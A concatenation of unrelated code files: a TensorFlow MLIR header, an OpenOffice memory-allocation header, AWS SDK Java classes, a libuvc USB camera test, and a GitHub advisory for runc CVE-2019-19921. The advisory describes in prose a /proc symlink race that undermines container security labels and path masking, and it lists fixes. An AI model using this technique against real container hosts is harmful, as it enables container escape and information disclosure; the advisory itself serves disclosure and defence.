b->create<mlir::ZeroExtendIOp>(xla_op.getLoc(), result_types, args, mlir::None); } // No conversion is needed for the same width integers return args.front(); } // TODO(dfki-ehna): Add other primitive type conversions // if (mlir::FpToSiOp::areCastCompatible(sourceType, targetType)) { // return b.create<mlir::FpToSiOp>(xla_op.getLoc(), result_types, // args,mlir::None); // } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CosOp>(xla_lhlo::CosOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CosOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CosOp>(xla_hlo::CosOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CosOp>{}( xla_op.getLoc(), result_types, args, b); } /// Implements the conversion of XLA op to scalar op (to use within region of a /// linalg.generic op) for compare-select style operations like min/max. template <typename... Args> struct MapXlaCompareSelectOpToStdScalarOp { Value operator()(Location loc, StringRef comparison_direction, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return nullptr; } }; /// Specialization which allows converting to a comparison operation in standard /// dialect with a given predicate based on the element type of the operand. template <typename SupportedType, typename StdCompareOp, typename Predicate, typename... Args> struct MapXlaCompareSelectOpToStdScalarOp<SupportedType, StdCompareOp, Predicate, Args...> { Value operator()(Location loc, StringRef comparison_direction, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<SupportedType>()) { auto predicate = getCmpPredicate<Predicate>(comparison_direction); assert(predicate.hasValue() && "expected valid comparison direction"); auto cmp = b->template create<StdCompareOp>(loc, predicate.getValue(), args[0], args[1]); return b->create<::mlir::SelectOp>(loc, cmp, args[0], args[1]); } return MapXlaCompareSelectOpToStdScalarOp<Args...>{}( loc, comparison_direction, result_types, args, b); } }; template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::MaxOp>(xla_lhlo::MaxOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_lhlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_lhlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "GT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::MaxOp>(xla_hlo::MaxOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_hlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_hlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "GT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::MinOp>(xla_lhlo::MinOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_lhlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_lhlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "LT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::MinOp>(xla_hlo::MinOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_hlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_hlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "LT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::NegOp>(xla_lhlo::NegOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::NegFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::NegOp>(xla_hlo::NegOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::NegFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::SelectOp>( xla_lhlo::SelectOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<::mlir::SelectOp>{}(xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::SelectOp>( xla_hlo::SelectOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<::mlir::SelectOp>{}(xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::SignOp>( xla_lhlo::SignOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<FloatType>()) { FloatType float_type = element_type.cast<FloatType>(); APFloat const_value = float_type.isF32() ? APFloat(1.0f) : APFloat(1.0); Value one = b->create<mlir::ConstantFloatOp>(xla_op.getLoc(), const_value, float_type); return b->create<::mlir::CopySignOp>(xla_op.getLoc(), result_types, one, args[0]); } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::TanhOp>( xla_lhlo::TanhOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::TanhOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::TanhOp>(xla_hlo::TanhOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::TanhOp>{}( xla_op.getLoc(), result_types, args, b); } } // namespace xla_lhlo } // namespace mlir #endif // TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_
10,741
679
<filename>main/sal/inc/rtl/alloc.h /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _RTL_ALLOC_H_ #define _RTL_ALLOC_H_ # include <sal/types.h> #ifdef __cplusplus extern "C" { #endif /** Allocate memory. @descr A call to this function will return NULL upon the requested memory size being either zero or larger than currently allocatable. @param Bytes [in] memory size. @return pointer to allocated memory. */ void * SAL_CALL rtl_allocateMemory ( sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Reallocate memory. @descr A call to this function with parameter 'Ptr' being NULL is equivalent to a rtl_allocateMemory() call. A call to this function with parameter 'Bytes' being 0 is equivalent to a rtl_freeMemory() call. @see rtl_allocateMemory() @see rtl_freeMemory() @param Ptr [in] pointer to previously allocated memory. @param Bytes [in] new memory size. @return pointer to reallocated memory. May differ from Ptr. */ void * SAL_CALL rtl_reallocateMemory ( void * Ptr, sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Free memory. @param Ptr [in] pointer to previously allocated memory. @return none. Memory is released. Ptr is invalid. */ void SAL_CALL rtl_freeMemory ( void * Ptr ) SAL_THROW_EXTERN_C(); /** Allocate and zero memory. @descr A call to this function will return NULL upon the requested memory size being either zero or larger than currently allocatable. @param Bytes [in] memory size. @return pointer to allocated and zero'ed memory. */ void * SAL_CALL rtl_allocateZeroMemory ( sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Zero and free memory. @param Ptr [in] pointer to previously allocated memory. @param Bytes [in] memory size. @return none. Memory is zero'ed and released. Ptr is invalid. */ void SAL_CALL rtl_freeZeroMemory ( void * Ptr, sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Opaque rtl_arena_type. */ typedef struct rtl_arena_st rtl_arena_type; #define RTL_ARENA_NAME_LENGTH 31 /** rtl_arena_create() * * @param pName [in] descriptive name; for debugging purposes. * @param quantum [in] resource allocation unit / granularity; rounded up to next power of 2. * @param quantum_cache_max [in] max resources to cache; rounded up to next multiple of quantum; usually 0. * @param source_arena [in] passed as argument to source_alloc, source_free; usually NULL. * @param source_alloc [in] function to allocate resources; usually rtl_arena_alloc. * @param source_free [in] function to free resources; usually rtl_arena_free. * @param nFlags [in] flags; usually 0. * * @return pointer to rtl_arena_type, or NULL upon failure. * * @see rtl_arena_destroy() */ rtl_arena_type * SAL_CALL rtl_arena_create ( const char * pName, sal_Size quantum, sal_Size quantum_cache_max, rtl_arena_type * source_arena, void * (SAL_CALL * source_alloc)(rtl_arena_type *, sal_Size *), void (SAL_CALL * source_free) (rtl_arena_type *, void *, sal_Size), int nFlags ) SAL_THROW_EXTERN_C(); /** rtl_arena_destroy() * * @param pArena [in] the arena to destroy. * @return None * * @see rtl_arena_create() */ void SAL_CALL rtl_arena_destroy ( rtl_arena_type * pArena ) SAL_THROW_EXTERN_C(); /** rtl_arena_alloc() * * @param pArena [in] arena from which resource is allocated. * @param pBytes [inout] size of resource to allocate. * * @return allocated resource, or NULL upon failure. * * @see rtl_arena_free() */ void * SAL_CALL rtl_arena_alloc ( rtl_arena_type * pArena, sal_Size * pBytes ) SAL_THROW_EXTERN_C(); /** rtl_arena_free() * * @param pArena [in] arena from which resource was allocated. * @param pAddr [in] resource to free. * @param nBytes [in] size of resource. * * @return None. * * @see rtl_arena_alloc() */ void SAL_CALL rtl_arena_free ( rtl_arena_type * pArena, void * pAddr, sal_Size nBytes ) SAL_THROW_EXTERN_C(); /** Opaque rtl_cache_type. */ typedef struct rtl_cache_st rtl_cache_type; #define RTL_CACHE_NAME_LENGTH 31 #define RTL_CACHE_FLAG_BULKDESTROY 1 /** rtl_cache_create() * * @param pName [in] descriptive name; for debugging purposes. * @param nObjSize [in] object size. * @param nObjAlign [in] object alignment; usually 0 for suitable default. * @param constructor [in] object constructor callback function; returning 1 for success or 0 for failure. * @param destructor [in] object destructor callback function. * @param reclaim [in] reclaim callback function. * @param pUserArg [in] opaque argument passed to callback functions. * @param nFlags [in] flags. * * @return pointer to rtl_cache_type, or NULL upon failure. * * @see rtl_cache_destroy() */ rtl_cache_type * SAL_CALL rtl_cache_create ( const char * pName, sal_Size nObjSize, sal_Size nObjAlign, int (SAL_CALL * constructor)(void * pObj, void * pUserArg), void (SAL_CALL * destructor) (void * pObj, void * pUserArg), void (SAL_CALL * reclaim) (void * pUserArg), void * pUserArg, rtl_arena_type * pSource, int nFlags ) SAL_THROW_EXTERN_C(); /** rtl_cache_destroy() * * @param pCache [in] the cache to destroy. * * @return None. * * @see rtl_cache_create() */ void SAL_CALL rtl_cache_destroy ( rtl_cache_type * pCache ) SAL_THROW_EXTERN_C(); /** rtl_cache_alloc() * * @param pCache [in] cache from which object is allocated. * * @return pointer to allocated object, or NULL upon failure. */ void * SAL_CALL rtl_cache_alloc ( rtl_cache_type * pCache ) SAL_THROW_EXTERN_C(); /** rtl_cache_free() * * @param pCache [in] cache from which object was allocated. * @param pObj [in] object to free. * * @return None. * * @see rtl_cache_alloc() */ void SAL_CALL rtl_cache_free ( rtl_cache_type * pCache, void * pObj ) SAL_THROW_EXTERN_C(); #ifdef __cplusplus } #endif #endif /*_RTL_ALLOC_H_ */
2,630
1,467
<filename>core/sdk-core/src/main/java/software/amazon/awssdk/core/retry/backoff/BackoffStrategy.java /* * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ package software.amazon.awssdk.core.retry.backoff; import java.time.Duration; import software.amazon.awssdk.annotations.SdkPublicApi; import software.amazon.awssdk.core.internal.retry.SdkDefaultRetrySetting; import software.amazon.awssdk.core.retry.RetryMode; import software.amazon.awssdk.core.retry.RetryPolicyContext; @SdkPublicApi @FunctionalInterface public interface BackoffStrategy { /** * Max permitted retry times. To prevent exponentialDelay from overflow, there must be 2 ^ retriesAttempted * <= 2 ^ 31 - 1, which means retriesAttempted <= 30, so that is the ceil for retriesAttempted. */ int RETRIES_ATTEMPTED_CEILING = (int) Math.floor(Math.log(Integer.MAX_VALUE) / Math.log(2)); /** * Compute the delay before the next retry request. This strategy is only consulted when there will be a next retry. * * @param context Context about the state of the last request and information about the number of requests made. * @return Amount of time in milliseconds to wait before the next attempt. Must be non-negative (can be zero). */ Duration computeDelayBeforeNextRetry(RetryPolicyContext context); default int calculateExponentialDelay(int retriesAttempted, Duration baseDelay, Duration maxBackoffTime) { int cappedRetries = Math.min(retriesAttempted, RETRIES_ATTEMPTED_CEILING); return (int) Math.min(baseDelay.multipliedBy(1L << cappedRetries).toMillis(), maxBackoffTime.toMillis()); } static BackoffStrategy defaultStrategy() { return defaultStrategy(RetryMode.defaultRetryMode()); } static BackoffStrategy defaultStrategy(RetryMode retryMode) { return FullJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.baseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); } static BackoffStrategy defaultThrottlingStrategy() { return defaultThrottlingStrategy(RetryMode.defaultRetryMode()); } static BackoffStrategy defaultThrottlingStrategy(RetryMode retryMode) { switch (retryMode) { case LEGACY: return EqualJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.throttledBaseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); case ADAPTIVE: case STANDARD: return FullJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.throttledBaseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); default: throw new IllegalStateException("Unsupported RetryMode: " + retryMode); } } static BackoffStrategy none() { return FixedDelayBackoffStrategy.create(Duration.ofMillis(1)); } }
1,598
892
{ "schema_version": "1.2.0", "id": "GHSA-fh74-hm69-rqjw", "modified": "2021-05-24T21:20:41Z", "published": "2021-05-27T18:41:17Z", "aliases": [ "CVE-2019-19921" ], "summary": "procfs race condition with a shared volume mount", "details": "### Impact\nBy crafting a malicious root filesystem (with `/proc` being a symlink to a directory which was inside a volume shared with another running container), an attacker in control of both containers can trick `runc` into not correctly configuring the container&amp;amp;amp;amp;#39;s security labels and not correctly masking paths inside `/proc` which contain potentially-sensitive information about the host (or even allow for direct attacks against the host).\n\nIn order to exploit this bug, an untrusted user must be able to spawn custom containers with custom mount configurations (such that a volume is shared between two containers). It should be noted that we consider this to be a fairly high level of access for an untrusted user -- and we do not recommend allowing completely untrusted users to have such degrees of access without further restrictions.\n\n### Patches\nThis vulnerability has been fixed in `1.0.0-rc10`. It should be noted that the current fix is effectively a hot-fix, and there are known ways for it to be worked around (such as making the entire root filesystem a shared volume controlled by another container). We recommend that users review their access policies to ensure that untrusted users do not have such high levels of controls over container mount configuration.\n\n### Workarounds\nIf you are not providing the ability for untrusted users to configure mountpoints for `runc` (or through a higher-level tool such as `docker run -v`) then you are not vulnerable to this issue. This exploit requires fairly complicated levels of access (which are available for some public clouds but are not necessarily available for all deployments).\n\nAdditionally, it appears as though it is not possible to exploit this vulnerability through Docker (due to the order of mounts Docker generates). However you should not depend on this, as it may be possible to work around this roadblock.\n\n### Credits\nThis vulnerability was discovered by Cure53, as part of a third-party security audit.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/opencontainers/runc/issues/new).\n* Email us at [<EMAIL>](mailto:<EMAIL>), or [<EMAIL>](mailto:<EMAIL>) if you think you&amp;amp;amp;amp;#39;ve found a security bug.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:U/RC:U" } ], "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc/libcontainer" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-fh74-hm69-rqjw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19921" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/issues/2197" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/pull/2190" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/pull/2207" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0688" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0695" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/releases" }, { "type": "WEB", "url": "https://security-tracker.debian.org/tracker/CVE-2019-19921" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-21" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4297-1/" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00018.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "severity": "MODERATE", "github_reviewed": true } }
1,727
580
<reponame>omonimus1/angorithm_AND_dataStructure // UVA01124.cpp : This file contains the 'main' function. Program execution begins and ends there. // #include <iostream> #include<string> using namespace std; int main() { string line; while (getline(cin, line)) { cout << line << endl; } }
122
3,477
<filename>src/parser/pass.h // Copyright Microsoft and Project Verona Contributors. // SPDX-License-Identifier: MIT #pragma once #include "dispatch.h" #include "fields.h" #include <iostream> namespace verona::parser { #define AST_PASS \ void pre(NodeDef& node) {} \ void post(NodeDef& node) {} template<typename F> struct Pass { AstPath stack; bool ok; std::ostream out; Pass() : ok(true), out(std::cerr.rdbuf()) {} operator bool() const { return ok; } void set_error(std::ostream& s) { out.rdbuf(s.rdbuf()); } std::ostream& error() { ok = false; return out << "--------" << std::endl; } Location loc() { if (stack.size() > 0) return stack.back()->location; return {}; } text line() { return text(loc()); } Ast parent() { if (stack.size() > 1) return stack[stack.size() - 2]; return {}; } Pass& operator<<(Location& loc) { // Handle location fields from the node handling functions. return *this; } template<typename T> Pass& operator<<(Node<T>& node) { stack.push_back(node); dispatch(*this, node); stack.pop_back(); return *this; } template<typename T> Pass& operator<<(List<T>& nodes) { for (auto& node : nodes) *this << node; return *this; } void operator()() {} template<typename T> void operator()(T& node) { auto& check = stack.back(); static_cast<F*>(this)->pre(node); // Don't continue if this node was replaced. if (stack.back() != check) return; *this << fields(node); static_cast<F*>(this)->post(node); } }; }
794
940
<gh_stars>100-1000 /* * disk.h - Generic disk driver * * Basilisk II (C) 1997-2008 <NAME> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #ifndef DISK_H #define DISK_H const int DiskRefNum = -63; // RefNum of driver const uint16 DiskDriverFlags = 0x6f04; // Driver flags extern const uint8 DiskIcon[258]; // Icon data (copied to ROM by PatchROM()) extern uint32 DiskIconAddr; // Icon address (Mac address space, set by PatchROM()) extern void DiskInit(void); extern void DiskExit(void); extern void DiskInterrupt(void); extern bool DiskMountVolume(void *fh); extern int16 DiskOpen(uint32 pb, uint32 dce); extern int16 DiskPrime(uint32 pb, uint32 dce); extern int16 DiskControl(uint32 pb, uint32 dce); extern int16 DiskStatus(uint32 pb, uint32 dce); #endif
458
5,156
<reponame>jalapenopuzzle/rr<filename>src/test/usb.c /* -*- Mode: C; tab-width: 8; c-basic-offset: 2; indent-tabs-mode: nil; -*- */ /* Based on https://github.com/ktossell/libuvc/blob/master/src/example.c Software License Agreement (BSD License) Copyright (C) 2010-2015 <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the author nor other contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* Tests a subset of the USBDEVFS ioctls. Requires libuvc to build: https://github.com/ktossell/libuvc Therefore this test is not built/run by default. */ #include "util.h" #include "libuvc/libuvc.h" static int frame_count = 0; void cb(uvc_frame_t* frame, __attribute__((unused)) void* ptr) { uvc_frame_t* bgr; uvc_error_t ret; bgr = uvc_allocate_frame(frame->width * frame->height * 3); test_assert(bgr != NULL); ret = uvc_any2bgr(frame, bgr); test_assert(ret == 0); ++frame_count; uvc_free_frame(bgr); } int main(void) { uvc_context_t* ctx; uvc_device_t* dev; uvc_device_handle_t* devh; uvc_stream_ctrl_t ctrl; uvc_error_t res; res = uvc_init(&ctx, NULL); test_assert(res >= 0); atomic_puts("UVC initialized"); /* Locates the first attached UVC device, stores in dev */ res = uvc_find_device(ctx, &dev, 0, 0, NULL); /* filter devices: vendor_id, product_id, "serial_num" */ if (res < 0) { atomic_puts("No device found"); atomic_puts("EXIT-SUCCESS"); return 0; } atomic_puts("Device found"); /* Try to open the device: requires exclusive access */ res = uvc_open(dev, &devh); if (res < 0) { atomic_puts("Can't open device"); atomic_puts("EXIT-SUCCESS"); return 0; } atomic_puts("Device opened"); /* Print out a message containing all the information that libuvc * knows about the device */ uvc_print_diag(devh, stdout); /* Try to negotiate a 640x480 30 fps YUYV stream profile */ res = uvc_get_stream_ctrl_format_size( devh, &ctrl, /* result stored in ctrl */ UVC_FRAME_FORMAT_YUYV, /* YUV 422, aka YUV 4:2:2. try _COMPRESSED */ 640, 480, 30 /* width, height, fps */ ); /* Print out the result */ uvc_print_stream_ctrl(&ctrl, stdout); if (res < 0) { atomic_puts("No matching stream"); atomic_puts("EXIT-SUCCESS"); return 0; } /* Start the video stream. The library will call user function cb: * cb(frame, (void*) 12345) */ res = uvc_start_streaming(devh, &ctrl, cb, (void*)12345, 0); test_assert(res >= 0); atomic_puts("Streaming..."); uvc_set_ae_mode(devh, 1); /* e.g., turn on auto exposure */ sleep(2); /* stream for 2 seconds */ atomic_puts("Stopping streaming."); /* End the stream. Blocks until last callback is serviced */ uvc_stop_streaming(devh); atomic_puts("Done streaming."); /* Release our handle on the device */ uvc_close(devh); atomic_puts("Device closed"); /* Release the device descriptor */ uvc_unref_device(dev); /* Close the UVC context. This closes and cleans up any existing device * handles, * and it closes the libusb context if one was not provided. */ uvc_exit(ctx); test_assert(frame_count > 0); atomic_puts("EXIT-SUCCESS"); return 0; }
1,653
3,372
/* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.kinesisanalyticsv2.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * Describes the application, including the application Amazon Resource Name (ARN), status, latest version, and input * and output configurations. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/kinesisanalyticsv2-2018-05-23/ApplicationDetail" * target="_top">AWS API Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ApplicationDetail implements Serializable, Cloneable, StructuredPojo { /** * <p> * The ARN of the application. * </p> */ private String applicationARN; /** * <p> * The description of the application. * </p> */ private String applicationDescription; /** * <p> * The name of the application. * </p> */ private String applicationName; /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> */ private String runtimeEnvironment; /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> */ private String serviceExecutionRole; /** * <p> * The status of the application. * </p> */ private String applicationStatus; /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> */ private Long applicationVersionId; /** * <p> * The current timestamp when the application was created. * </p> */ private java.util.Date createTimestamp; /** * <p> * The current timestamp when the application was last updated. * </p> */ private java.util.Date lastUpdateTimestamp; /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> */ private ApplicationConfigurationDescription applicationConfigurationDescription; /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> */ private java.util.List<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions; /** * <p> * The details of the maintenance configuration for the application. * </p> */ private ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription; /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> */ private Long applicationVersionUpdatedFrom; /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> */ private Long applicationVersionRolledBackFrom; /** * <p> * A value you use to implement strong concurrency for application updates. * </p> */ private String conditionalToken; /** * <p> * The version to which you want to roll back the application. * </p> */ private Long applicationVersionRolledBackTo; /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> */ private String applicationMode; /** * <p> * The ARN of the application. * </p> * * @param applicationARN * The ARN of the application. */ public void setApplicationARN(String applicationARN) { this.applicationARN = applicationARN; } /** * <p> * The ARN of the application. * </p> * * @return The ARN of the application. */ public String getApplicationARN() { return this.applicationARN; } /** * <p> * The ARN of the application. * </p> * * @param applicationARN * The ARN of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationARN(String applicationARN) { setApplicationARN(applicationARN); return this; } /** * <p> * The description of the application. * </p> * * @param applicationDescription * The description of the application. */ public void setApplicationDescription(String applicationDescription) { this.applicationDescription = applicationDescription; } /** * <p> * The description of the application. * </p> * * @return The description of the application. */ public String getApplicationDescription() { return this.applicationDescription; } /** * <p> * The description of the application. * </p> * * @param applicationDescription * The description of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationDescription(String applicationDescription) { setApplicationDescription(applicationDescription); return this; } /** * <p> * The name of the application. * </p> * * @param applicationName * The name of the application. */ public void setApplicationName(String applicationName) { this.applicationName = applicationName; } /** * <p> * The name of the application. * </p> * * @return The name of the application. */ public String getApplicationName() { return this.applicationName; } /** * <p> * The name of the application. * </p> * * @param applicationName * The name of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationName(String applicationName) { setApplicationName(applicationName); return this; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @see RuntimeEnvironment */ public void setRuntimeEnvironment(String runtimeEnvironment) { this.runtimeEnvironment = runtimeEnvironment; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @return The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @see RuntimeEnvironment */ public String getRuntimeEnvironment() { return this.runtimeEnvironment; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @return Returns a reference to this object so that method calls can be chained together. * @see 